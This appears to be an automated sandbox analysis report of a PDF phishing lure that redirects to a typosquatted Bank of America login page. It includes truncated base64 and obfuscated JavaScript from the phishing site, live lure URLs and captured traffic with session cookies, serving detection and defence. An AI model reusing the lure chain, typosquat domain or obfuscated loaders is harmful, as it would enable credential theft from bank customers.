Edit tour

Windows Analysis Report
DEEZI80S.pdf

Overview

General Information

Sample name:	DEEZI80S.pdf renamed because original name is a hash value
Original sample name:	Mk Steps - nIin Surity Ntifition NUM-PB4SDEEZI80S.pdf
Analysis ID:	1592047
MD5:	13ab8bff5a63ec4714eb396696c73873
SHA1:	2362f992df475a6ca17aefe6880f397f52e138d2
SHA256:	f73884ab8ba0ac61f8cc90095a5e7df72262348178182e739458f9370d1c4bea
Infos:

Detection

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

AI detected landing page (webpage, office document or email)

AI detected suspicious URL

Detected non-DNS traffic on DNS port

Document contains embedded VBA macros

Document misses a certain OLE stream usually present in this Microsoft Office document type

HTML body contains low number of good links

HTML body contains password input but no form action

HTML page contains hidden javascript code

HTML page contains obfuscated script src

IP address seen in connection with other malware

Invalid T&C link found

Stores files to the Windows start menu directory

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

Process Tree

System is w10x64_ra

Acrobat.exe (PID: 1084 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\DEEZI80S.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 6056 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 1140 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1588 --field-trial-handle=1568,i,17243078238320737959,17368587101676185686,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

chrome.exe (PID: 7916 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://connectauthentication.blob.core.windows.net/open/complete.html?h9dhy MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

chrome.exe (PID: 8100 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1852,i,3534187721205768075,1816576997033915686,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Source: chromecache_465.15.dr

Binary or memory string: a = "-----BEGIN PUBLIC KEY-----\n" + (this.wordwrap(this.getPublicBaseKeyB64()) + "\n");

memstr_31bcaee6-9

Phishing

AI detected phishing page

Source: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go	Joe Sandbox AI: Score: 9 Reasons: The brand 'Bank of America' is a well-known financial institution., The legitimate domain for Bank of America is 'bankofamerica.com'., The URL 'online.access.secure.bankofamerlica.com' contains a misspelling of 'bankofamerica' as 'bankofamerlica'., The presence of multiple subdomains and the misspelling are common phishing tactics., The input fields 'User ID' and 'Password' are typical targets for phishing attempts. DOM: 2.2.pages.csv
Source: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go	Joe Sandbox AI: Score: 9 Reasons: The brand 'Bank of America' is a well-known financial institution., The legitimate domain for Bank of America is 'bankofamerica.com'., The URL 'online.access.secure.bankofamerlica.com' contains a misspelling of 'bankofamerica' as 'bankofamerlica'., The presence of multiple subdomains and the misspelling are common phishing tactics., The input fields 'User ID' and 'Password' are typical targets for phishing attempts. DOM: 2.3.pages.csv
Source: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go	Joe Sandbox AI: Score: 9 Reasons: The brand 'Bank of America' is a well-known financial institution., The legitimate domain for Bank of America is 'bankofamerica.com'., The provided URL 'online.access.secure.bankofamerlica.com' contains a misspelling of 'bankofamerica' as 'bankofamerlica'., The URL structure includes multiple subdomains which can be a tactic used in phishing to mimic legitimate URLs., The presence of input fields for 'User ID' and 'Password' is typical for phishing sites attempting to capture sensitive information. DOM: 2.4.pages.csv

AI detected landing page (webpage, office document or email)

Source: PDF document

Joe Sandbox AI: PDF document contains prominent button: 'continue'

AI detected suspicious URL

Source: URL	Joe Sandbox AI: AI detected Brand spoofing attempt in URL: https://bankofamerlica.com
Source: URL	Joe Sandbox AI: AI detected Typosquatting in URL: https://bankofamerlica.com

Source: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go	HTTP Parser: Number of links: 0
Source: https://www.virustotal.com/gui/search/https%253A%252F%252Fonline.access.secure.bankofamerlica.com%252Flogin%252Fsign-in%252FsignOnV2Screen.go	HTTP Parser: Number of links: 0

Source: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://online.access.secure.bankofamerlica.com/secure/

HTTP Parser: Base64 decoded: function _0x5f48(_0x2c5e02,_0xe19f15){var _0x1b34d0=_0x1b34();return _0x5f48=function(_0x5f482d,_0x502389){_0x5f482d=_0x5f482d-0x143;var _0x72c7d7=_0x1b34d0[_0x5f482d];return _0x72c7d7;},_0x5f48(_0x2c5e02,_0xe19f15);}(function(_0x471b0b,_0x52b3dd){var _0x...

Source: https://online.access.secure.bankofamerlica.com/secure/	HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gXzB4NWY0OChfMHgyYzVlMDIsXzB4ZTE5ZjE1KXt2YXIgXzB4MWIzNGQwPV8weDFiMzQoKTtyZXR1cm4gXzB4NWY0OD1mdW5jdGlvbihfMHg1ZjQ4MmQsXzB4NTAyMzg5KXtfMHg1ZjQ4MmQ9XzB4NWY0ODJkLTB4MTQzO3ZhciBfMHg3MmM3ZDc9XzB4MWIzNGQwW18weDVmNDgyZF
Source: https://online.access.secure.bankofamerlica.com/secure/	HTTP Parser: Script src: data:text/javascript;base64,dmFyIF8weDNmZDY5MD1fMHg0Y2VkOyhmdW5jdGlvbihfMHg4ZTVlOTgsXzB4NGFhOTEwKXt2YXIgXzB4MmJjNjY1PV8weDRjZWQsXzB4NDMwNGQ4PV8weDhlNWU5OCgpO3doaWxlKCEhW10pe3RyeXt2YXIgXzB4MzA1MjJhPS1wYXJzZUludChfMHgyYmM2NjUoMHgzZDcpKS8weDErcGFyc2VJbn
Source: https://online.access.secure.bankofamerlica.com/secure/	HTTP Parser: Script src: data:text/javascript;base64,dmFyIF8weDVkM2JjYj1fMHgyZmZlOyhmdW5jdGlvbihfMHgyMzhlYmEsXzB4M2Q4NzJhKXt2YXIgXzB4MTZlNGQ3PV8weDJmZmUsXzB4MzdiMzJjPV8weDIzOGViYSgpO3doaWxlKCEhW10pe3RyeXt2YXIgXzB4M2YxYmFkPS1wYXJzZUludChfMHgxNmU0ZDcoMHgxMTMpKS8weDErLXBhcnNlSW
Source: https://online.access.secure.bankofamerlica.com/secure/	HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gXzB4OTdjOChfMHgxNTEwOWIsXzB4MjYyNmRlKXtjb25zdCBfMHg1NDdlMDc9XzB4NTQ3ZSgpO3JldHVybiBfMHg5N2M4PWZ1bmN0aW9uKF8weDk3YzhmMSxfMHgyNjU4N2Epe18weDk3YzhmMT1fMHg5N2M4ZjEtMHgxN2M7bGV0IF8weDNhYjRlMj1fMHg1NDdlMDdbXzB4OTdjOG

Source: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go	HTTP Parser: Invalid link: Privacy
Source: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go	HTTP Parser: Invalid link: Privacy
Source: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go	HTTP Parser: Invalid link: Privacy

Source: https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.js

HTTP Parser: /*! jquery v3.5.1 | (c) js foundation and other contributors | jquery.org/license */ ! function(e, t) { "object" == typeof module && "object" == typeof module.exports ? module.exports = e.document ? t(e, !0) : function(e) { if (!e.document) { throw new error("jquery requires a window with a document") } return t(e) } : t(e)}("undefined" != typeof window ? window : this, function(c, e) { var t = [], r = object.getprototypeof, s = t.slice, g = t.flat ? function(e) { return t.flat.call(e) } : function(e) { return t.concat.apply([], e) }, u = t.push, i = t.indexof, n = {}, o = n.tostring, v = n.hasownproperty, a = v.tostring, l = a.call(object), y = {}, m = function(e) { return "function" == typeof e && "number" != typeof e.nodetype }, x = function(e) { return null != e && e === e.window ...

Source: https://www.virustotal.com/gui/search/https%253A%252F%252Fonline.access.secure.bankofamerlica.com%252Flogin%252Fsign-in%252FsignOnV2Screen.go	HTTP Parser: Iframe src: https://www.googletagmanager.com/ns.html?id=GTM-KFBGZNL
Source: https://www.virustotal.com/gui/search/https%253A%252F%252Fonline.access.secure.bankofamerlica.com%252Flogin%252Fsign-in%252FsignOnV2Screen.go	HTTP Parser: Iframe src: https://recaptcha.net/recaptcha/api2/anchor?ar=1&k=6Ldjgd0kAAAAAITm7ipWF7o7kPL_81SaSfdINiOc&co=aHR0cHM6Ly93d3cudmlydXN0b3RhbC5jb206NDQz&hl=en&v=zIriijn3uj5Vpknvt_LnfNbF&size=invisible&cb=22vaoty9boel

Source: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go

HTTP Parser: <input type="password" .../> found

Source: https://online.access.secure.bankofamerlica.com/secure/	HTTP Parser: No favicon
Source: https://www.virustotal.com/gui/home/url	HTTP Parser: No favicon

Source: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go	HTTP Parser: No <meta name="author".. found
Source: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go	HTTP Parser: No <meta name="author".. found
Source: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go	HTTP Parser: No <meta name="author".. found
Source: https://www.virustotal.com/gui/search/https%253A%252F%252Fonline.access.secure.bankofamerlica.com%252Flogin%252Fsign-in%252FsignOnV2Screen.go	HTTP Parser: No <meta name="author".. found

Source: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go	HTTP Parser: No <meta name="copyright".. found
Source: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go	HTTP Parser: No <meta name="copyright".. found
Source: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go	HTTP Parser: No <meta name="copyright".. found
Source: https://www.virustotal.com/gui/search/https%253A%252F%252Fonline.access.secure.bankofamerlica.com%252Flogin%252Fsign-in%252FsignOnV2Screen.go	HTTP Parser: No <meta name="copyright".. found

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries

Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.18:60708 -> 1.1.1.1:53

Source: Joe Sandbox View	IP Address: 188.119.66.154 188.119.66.154
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /?ref=9854tjwe46 HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://connectauthentication.blob.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /secure/ HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://connectauthentication.blob.core.windows.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; ref=9854tjwe46; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online.access.secure.bankofamerlica.com/secure/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D
Source: global traffic	HTTP traffic detected: GET /secure/secure.php HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://online.access.secure.bankofamerlica.com/secure/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D
Source: global traffic	HTTP traffic detected: GET /login/sign-in/signOnV2Screen.go HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://online.access.secure.bankofamerlica.com/secure/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /login/sign-in/signOnV2Screen.go HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/vipaa-v4-jawr.css HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/onetrust-style.css HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/special/css/loader.css HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/vipaa-v4-jawr.js HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/online-id-vipaa-module-enter-skin.js HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/mobile_llama.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/mobile_llama.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global traffic	HTTP traffic detected: GET /assets/online-id-vipaa-module-enter-skin.js HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
